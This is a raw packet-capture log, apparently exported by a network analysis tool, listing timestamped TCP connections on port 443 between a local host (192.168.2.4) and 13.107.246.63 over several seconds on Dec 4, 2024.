                                                                                                                                                                                  Dec 4, 2024 11:10:52.184468985 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:52.187835932 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:52.188180923 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.188429117 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.188429117 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.188440084 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:52.188447952 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:52.191047907 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.191082001 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:52.194133043 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.194283962 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.194298983 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:52.296310902 CET4434985913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:52.299886942 CET4434985913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:52.299947023 CET49859443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.300002098 CET49859443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.300002098 CET49859443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.300031900 CET4434985913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:52.300054073 CET4434985913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:52.302877903 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.302906036 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:52.303960085 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.304128885 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.304141998 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:52.389736891 CET4434986013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:52.393413067 CET4434986013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:52.393444061 CET4434986013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:52.393465042 CET49860443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.393503904 CET49860443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.393583059 CET49860443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.393596888 CET4434986013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:52.393606901 CET49860443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.393610954 CET4434986013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:52.396284103 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.396316051 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:52.396521091 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.396687031 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:52.396702051 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.421752930 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.422216892 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:53.422249079 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.422687054 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:53.422691107 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.462992907 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.463397980 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:53.463422060 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.463867903 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:53.463871956 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.874989986 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.875057936 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.875133991 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:53.875685930 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:53.875710964 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.875726938 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:53.875731945 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.879621983 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:53.879671097 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.879920006 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:53.880640030 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:53.880654097 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.898654938 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.903623104 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.903678894 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:53.903851986 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:53.903867960 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.903879881 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:53.903888941 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.911493063 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:53.911529064 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.911674023 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:53.911864042 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:53.911876917 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.975341082 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.987484932 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:53.987509966 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:53.988281012 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:53.988287926 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.086071014 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.089644909 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.089660883 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.093487024 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.093493938 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.177532911 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.177980900 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.178006887 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.185482025 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.185488939 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.419703960 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.423593044 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.428126097 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.473630905 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.473644018 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.473654032 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.473659992 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.500040054 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.500087023 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.500154972 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.500581980 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.500595093 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.531347990 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.534059048 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.534100056 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.534189939 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.541393042 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.541393042 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.541413069 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.541423082 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.545285940 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.545317888 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.545445919 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.545977116 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.545990944 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.623351097 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.626430988 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.626481056 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.628756046 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.628768921 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.628806114 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.628810883 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.658123970 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.658163071 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:54.658221006 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.706969023 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:54.706999063 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:55.597173929 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:55.598498106 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:55.598526955 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:55.599026918 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:55.599035025 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:55.691814899 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:55.694581985 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:55.694623947 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:55.695096016 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:55.695101023 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.136389017 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.139925003 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.142158031 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.142218113 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.142235041 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.142246962 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.142252922 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.145073891 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.145108938 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.145172119 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.145339966 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.145354033 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.218708038 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.219199896 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.219222069 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.219717979 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.219723940 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.335026026 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.335618019 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.335633993 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.336183071 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.336189985 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.422523022 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.423146963 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.423183918 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.423603058 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.423608065 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.655756950 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.659035921 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.659105062 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.659192085 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.659251928 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.659251928 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.659271002 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.659281015 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.662187099 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.662225008 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.662288904 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.662440062 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.662456036 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.779128075 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.779226065 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.779339075 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.789809942 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.789828062 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.789838076 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.789844990 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.792766094 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.792819023 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.792881012 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.793380976 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.793395042 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.858088970 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.862086058 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.862148046 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.862212896 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.862287045 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.862287045 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.862308025 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.862317085 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.864908934 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.864949942 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:56.865019083 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.865377903 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:56.865394115 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:57.241199970 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:57.241235018 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:57.241288900 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:57.241293907 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:57.241332054 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:57.243813038 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:57.243835926 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:57.243845940 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:57.243851900 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:57.267338037 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:57.267352104 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:57.267410040 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:57.278681040 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:57.278692961 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:57.895476103 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:57.896622896 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:57.896641970 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:57.897382021 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:57.897387028 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.330276012 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.333561897 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.335994959 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.335994959 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.335994959 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.338654041 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.338680983 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.338754892 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.338933945 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.338954926 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.385934114 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.388556957 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.388586044 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.388899088 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.388905048 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.511377096 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.512480021 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.512506008 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.512921095 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.512928009 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.647008896 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.647861004 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.647886038 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.648293972 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.648298025 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.785293102 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.785315990 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.820210934 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.823879957 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.823937893 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.824007988 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.824079037 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.824090958 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.824105978 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.824111938 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.826823950 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.826879025 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.826956987 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.827128887 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.827142000 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.948569059 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.951330900 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.951411009 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.951541901 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.951558113 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.951567888 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.951574087 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.955436945 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.955471039 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:58.955527067 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.955790043 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:58.955802917 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:59.060578108 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:59.061269045 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:59.061280012 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:59.061896086 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:59.061901093 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:59.090852976 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:59.095150948 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:59.095201015 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:59.095228910 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:59.095238924 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:59.098953009 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:59.099000931 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:59.099052906 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:59.099241018 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:59.099255085 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:59.504535913 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:59.507745981 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:59.507838011 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:59.508100033 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:59.508124113 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:59.508133888 CET49875443192.168.2.413.107.246.63
